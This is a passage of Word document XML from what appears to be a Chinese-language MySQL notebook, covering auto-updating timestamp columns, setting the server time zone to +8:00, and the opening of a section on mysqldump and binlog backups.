        <w:t>`uptime` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8789B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样数据在插入或者被修改的时候，该字段中的时间戳就会被更改为现在的时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBAB7B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22262ACA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc159779550"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四个设置该字段的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用案例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="2D445C6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CreateTime </w:t>
      </w:r>
      <w:r>
        <w:t>设置默认时间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CURRENT_TIMESTAMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329AA1A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ALTER TABLE `table_name`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71387E9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ADD COLUMN  `CreateTime` datetime NULL DEFAULT CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>创建时间</w:t>
      </w:r>
      <w:r>
        <w:t>' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E9CBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CreateTime </w:t>
      </w:r>
      <w:r>
        <w:t>设置默认时间</w:t>
      </w:r>
      <w:r>
        <w:t>CURRENT_TIMESTAMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAFC59F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ALTER TABLE `table_name`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713D18C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>MODIFY COLUMN  `CreateTime` datetime NULL DEFAULT CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>创建时间</w:t>
      </w:r>
      <w:r>
        <w:t>' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEBCCED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">UpdateTime </w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>默认时间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CURRENT_TIMESTAMP   </w:t>
      </w:r>
      <w:r>
        <w:t>设置更新时间为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ON UPDATE CURRENT_TIMESTAMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24218314" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ALTER TABLE `table_name`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AE6E15" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ADD COLUMN `UpdateTime` timestamp NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>创建时间</w:t>
      </w:r>
      <w:r>
        <w:t>' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F05EF4C" w14:textId="77777777" w:rsidR="006F03B5" w:rsidRDefault="006F03B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1A9E3B" w14:textId="77777777" w:rsidR="00A8389E" w:rsidRDefault="00A8389E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ALTER TABLE `table_name`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB4E74E" w14:textId="5057573D" w:rsidR="00A8389E" w:rsidRPr="00A8389E" w:rsidRDefault="00A8389E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ADD COLUMN `UpdateTime` </w:t>
      </w:r>
      <w:r w:rsidR="001A6FF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DATETIME</w:t>
      </w:r>
      <w:r w:rsidR="00004A8D" w:rsidRPr="00004A8D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidR="008649EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、更新</w:t>
      </w:r>
      <w:r>
        <w:t>时间</w:t>
      </w:r>
      <w:r>
        <w:t>' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE01684" w14:textId="77777777" w:rsidR="005B42EA" w:rsidRDefault="005B42EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="326BB459" w14:textId="32CC4818" w:rsidR="006F03B5" w:rsidRDefault="006F03B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果新建表想有这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建、更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动变化时间的字段：</w:t>
      </w:r>
      <w:r w:rsidR="00DF6A6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00DF6A6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>timestamp</w:t>
      </w:r>
      <w:r w:rsidR="00DF6A6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以直接改为</w:t>
      </w:r>
      <w:r w:rsidR="00DF6A6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>datetime</w:t>
      </w:r>
      <w:r w:rsidR="00DF6A6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型）</w:t>
      </w:r>
      <w:r w:rsidR="007E6B10" w:rsidRPr="007E6B10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>DEFAULT CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r w:rsidR="007E6B10" w:rsidRPr="009E1A5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E6B10" w:rsidRPr="009E1A5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>意思是默认是当前的时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F86BB39" w14:textId="77777777" w:rsidR="00203860" w:rsidRPr="00BC52A6" w:rsidRDefault="00203860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC52A6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CREATE TABLE table_name (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC93F65" w14:textId="77777777" w:rsidR="00203860" w:rsidRPr="00BC52A6" w:rsidRDefault="00203860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC52A6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7991CD52" w14:textId="77777777" w:rsidR="00203860" w:rsidRPr="00BC52A6" w:rsidRDefault="00203860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC52A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    UpdateTime TIMESTAMP NULL </w:t>
      </w:r>
      <w:r w:rsidRPr="007E6B10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>DEFAULT CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC52A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> ON UPDATE CURRENT_TIMESTAMP COMMENT '</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC52A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>创建时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC52A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697EB581" w14:textId="77777777" w:rsidR="00203860" w:rsidRPr="00BC52A6" w:rsidRDefault="00203860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC52A6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E10E29A" w14:textId="3D05F34D" w:rsidR="006F03B5" w:rsidRDefault="00203860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC52A6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F57FF5" w14:textId="77777777" w:rsidR="00203860" w:rsidRDefault="00203860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4446CE5D" w14:textId="77777777" w:rsidR="00203860" w:rsidRDefault="00203860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0091B83E" w14:textId="77777777" w:rsidR="00203860" w:rsidRDefault="00203860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C1F0F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UpdateTime </w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>默认时间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CURRENT_TIMESTAMP   </w:t>
      </w:r>
      <w:r>
        <w:t>设置更新时间为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ON UPDATE CURRENT_TIMESTAMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05465607" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ALTER TABLE `table_name`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765F0EA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>MODIFY COLUMN `UpdateTime` timestamp NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>创建时间</w:t>
      </w:r>
      <w:r>
        <w:t>' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1080D4F5" w14:textId="77777777" w:rsidR="00D9374F" w:rsidRDefault="00D9374F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E06670B" w14:textId="77777777" w:rsidR="00D9374F" w:rsidRDefault="00D9374F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6699EE68" w14:textId="55453A41" w:rsidR="00D9374F" w:rsidRDefault="00D9374F" w:rsidP="00D9374F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改时区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7C6CC3" w14:textId="77777777" w:rsidR="00D9374F" w:rsidRDefault="00D9374F" w:rsidP="00D9374F"/>
    <w:p w14:paraId="486AF9A5" w14:textId="2475D652" w:rsidR="00D9374F" w:rsidRPr="00D9374F" w:rsidRDefault="005212E0" w:rsidP="00D9374F">
      <w:r w:rsidRPr="005212E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select curtime();  #</w:t>
      </w:r>
      <w:r w:rsidRPr="005212E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="005212E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select now()</w:t>
      </w:r>
      <w:r w:rsidRPr="005212E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013004ED" w14:textId="108F9468" w:rsidR="00D9374F" w:rsidRDefault="0084333F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0084333F">
        <w:t>show variables like "%time_zone%";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726FAF0B" w14:textId="77777777" w:rsidR="005212E0" w:rsidRDefault="005212E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDF56BE" w14:textId="3A5DBD46" w:rsidR="0084333F" w:rsidRDefault="0084333F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改为东八区时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3EA7A6" w14:textId="0B4BF5A9" w:rsidR="005212E0" w:rsidRDefault="0084333F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0084333F">
        <w:t>set global time_zone = '+8:00';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368D6151" w14:textId="04A4A17C" w:rsidR="005212E0" w:rsidRDefault="0084333F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0084333F">
        <w:t>set time_zone = '+8:00';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68114593" w14:textId="0654F0A9" w:rsidR="0084333F" w:rsidRDefault="0084333F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0084333F">
        <w:t>flush privileges;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E751F" w14:textId="77777777" w:rsidR="0084333F" w:rsidRDefault="0084333F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16CFFEAD" w14:textId="77777777" w:rsidR="0084333F" w:rsidRDefault="0084333F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A6C26F" w14:textId="5D8A85D1" w:rsidR="0084333F" w:rsidRDefault="0084333F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>my</w:t>
      </w:r>
      <w:r>
        <w:t>.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C1750D" w14:textId="77777777" w:rsidR="0084333F" w:rsidRPr="0084333F" w:rsidRDefault="0084333F" w:rsidP="0084333F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084333F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t># vim /etc/my.cnf ##</w:t>
      </w:r>
      <w:r w:rsidRPr="0084333F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="0084333F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[mysqld]</w:t>
      </w:r>
      <w:r w:rsidRPr="0084333F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>区域中加上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B473A0" w14:textId="77777777" w:rsidR="0084333F" w:rsidRPr="0084333F" w:rsidRDefault="0084333F" w:rsidP="0084333F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084333F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC49D5C" w14:textId="77777777" w:rsidR="0084333F" w:rsidRPr="0084333F" w:rsidRDefault="0084333F" w:rsidP="0084333F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084333F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>default-time_zone = '+8:00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD5C344" w14:textId="77777777" w:rsidR="0084333F" w:rsidRPr="0084333F" w:rsidRDefault="0084333F" w:rsidP="0084333F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084333F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD2C29E" w14:textId="7CB0D04E" w:rsidR="0084333F" w:rsidRDefault="0084333F" w:rsidP="0084333F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0084333F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t># /etc/init.d/mysqld restart ##</w:t>
      </w:r>
      <w:r w:rsidRPr="0084333F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>重启</w:t>
      </w:r>
      <w:r w:rsidRPr="0084333F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="0084333F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使新时区生效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F33D14" w14:textId="77777777" w:rsidR="00D9374F" w:rsidRDefault="00D9374F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3300EB" w14:textId="77777777" w:rsidR="00D9374F" w:rsidRDefault="00D9374F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C1FAC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc159779551"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备份：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>binlog</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="27BE8387" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C8A6B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20230129</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>期间给海林写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SCAVulDataBackUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的整体的备份思路：需要参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本处理时间、参数两节，以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理命令执行多参数传递给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本，以及本节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --replace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项结合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段名（时间类型）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某个时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B077B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
